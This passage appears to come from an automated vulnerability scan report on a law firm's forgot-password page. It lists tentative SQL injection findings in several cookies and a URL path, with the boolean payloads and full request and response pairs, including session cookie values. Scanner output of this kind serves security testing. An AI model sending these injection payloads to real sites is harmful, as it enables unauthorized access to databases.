<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.46. http://www.pillsburylaw.com/connect_forgotpassword.cfm [MEDIAUSERNAME cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The MEDIAUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 19507347'%20or%201%3d1--%20 and 19507347'%20or%201%3d2--%20 were each submitted in the MEDIAUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=19507347'%20or%201%3d1--%20; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:53:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: MEDIAUSERNAME=;expires=Wed, 12-May-2010 17:53:15 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=19507347'%20or%201%3d2--%20; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:53:15 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.47. http://www.pillsburylaw.com/connect_forgotpassword.cfm [PCONNECTID cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The PCONNECTID cookie appears to be vulnerable to SQL injection attacks. The payloads 16640643'%20or%201%3d1--%20 and 16640643'%20or%201%3d2--%20 were each submitted in the PCONNECTID cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=16640643'%20or%201%3d1--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:53:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCONNECTID=;expires=Wed, 12-May-2010 17:53:00 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=16640643'%20or%201%3d2--%20; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:52:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.48. http://www.pillsburylaw.com/connect_forgotpassword.cfm [PCUSERNAME cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The PCUSERNAME cookie appears to be vulnerable to SQL injection attacks. The payloads 12194880'%20or%201%3d1--%20 and 12194880'%20or%201%3d2--%20 were each submitted in the PCUSERNAME cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=12194880'%20or%201%3d1--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:53:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: PCUSERNAME=;expires=Wed, 12-May-2010 17:53:05 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=12194880'%20or%201%3d2--%20; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:53:05 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<META NAME="robots" CONTENT="noindex,nofollow">
<title>Forgot Password</title>
<link href="/scripts/general.css" rel="stylesheet" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/sIFR-screen.css" type="text/css" media="screen" />
<link rel="stylesheet" href="/scripts/sIFR-print.css" type="text/css" media="print" />
<script language="javascript" type="text/javascript" src="/scripts/sifr.js"></script>
<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #F3F4F4;
   margin-left: 0px;
   margin-top: 0px;
}
-->
</style>
<script language="javascript" type="text/javascript" src="scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.validate.js"></script>
<script language="javascript" type="text/javascript">
   $(document).ready(function(){
       $('#emailform').validate();
   })
</script>
<script type="text/javascript">
<!--
_CF_checkemailform = function(_CF_this)
{
//reset on submit
_CF_error_exists = false;
_CF_error_messages = new Array();
_CF_error_fields = new Object();
_CF_FirstErrorField = null;


//display error messages and return success
if( _CF_error_exists )
{
if( _CF_error_messages.length > 0 )
{
// show alert() message

...[SNIP]...

1.49. http://www.pillsburylaw.com/connect_forgotpassword.cfm [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 15566183'%20or%201%3d1--%20 and 15566183'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm15566183'%20or%201%3d1--%20?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11819537;path=/
Set-Cookie: CFTOKEN=91778988;path=/
Date: Thu, 12 May 2011 17:53:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3homepage.js"></script>


<link rel="stylesheet" href="/scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,td,th {
   font-size: 9pt;
}
body {
   background-color: #FFF; /* #F3F4F4; */
   margin-left: 0px;
   margin-top: 0px;
   margin-right: 10px;
   margin-bottom: 10px;
}
-->
</style>
<!--[if IE]>
<style type="text/css">
bo
...[SNIP]...

Request 2

GET /connect_forgotpassword.cfm15566183'%20or%201%3d2--%20?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.3; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 2 (redirected)

HTTP/1.1 200 OK
Content-Length: 18948
Content-Type: text/html
Content-Location: http://www.pillsburylaw.com/404.htm
Last-Modified: Wed, 09 Feb 2011 21:25:38 GMT
Accept-Ranges: bytes
ETag: "b4792ae59fc8cb1:b91"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 12 May 2011 17:53:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>


<title>Pillsbury Law &gt; Page or File Not Found</title>
<META name="description" content="Pillsbury Winthrop Shaw Pittman">
<META name="keywords" content="">
<META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=iso-8859-1" />
<link rel="shortcut icon" type="image/ico" href="/favicon.ico">
<META HTTP-EQUIV="imagetoolbar" CONTENT="no">
<meta name="verify-v1" content="ZyDzeYw1HMb2yJudqIIqE+bMnyWw5jHvupSO4NAX2cA=" >
<meta http-equiv="X-UA-Compatible" content="IE=8" />

<link rel="stylesheet" href="/scripts/general.css?v=20110202" type="text/css" media="all" />
<link rel="stylesheet" href="/scripts/menu.css?v=20110202" type="text/css" media="all" />

<script language="javascript" type="text/javascript" src="/scripts/jquery.js"></script>
<script language="javascript" type="text/javascript" src="/scripts/jquery.dimensions.js"></script>


<link rel="stylesheet" href="/sifr3/sifr3.css" type="text/css" media="screen" />

<script language="javascript" type="text/javascript" src="/sifr3/sifr3.js"></script>


<link rel="stylesheet" href="scripts/nyroModal/nyroModal.css" type="text/css" media="screen" />
<script language="javascript" type="text/javascript" src="/scripts/nyroModal/nyroModal.js"></script>

<script type="text/javascript">
<!--//
function checkSearchForm(){
    if((document.forms.sitesearch.keyword.value.length == 0)||(document.forms.sitesearch.keyword.value == "Search")){
       alert('Please enter a keyword for your search.');
       document.forms.sitesearch.keyword.focus();
       return false;
       }
   }
-->
</script>

<style type="text/css">
<!--
body,
...[SNIP]...

1.50. http://www.pillsburylaw.com/connect_forgotpassword.cfm [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.pillsburylaw.com
Path:   /connect_forgotpassword.cfm

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. The payloads 12242310'%20or%201%3d1--%20 and 12242310'%20or%201%3d2--%20 were each submitted in the __utma cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
Cookie: __utma=249287046.1504885052.1305202905.1305216540.1305218658.312242310'%20or%201%3d1--%20; __utmz=249287046.1305216540.2.2.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2012%3A44%3A27; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46; CFID=11819537; CFTOKEN=91778988; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utmc=249287046

Response 1 (redirected)

HTTP/1.1 302 Moved Temporarily
Connection: close
Date: Thu, 12 May 2011 17:52:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: __UTMA=;expires=Wed, 12-May-2010 17:52:04 GMT;path=/
location: /
Content-Type: text/html; charset=UTF-8

Request 2

GET /connect_forgotpassword.cfm?p=99 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageID=99
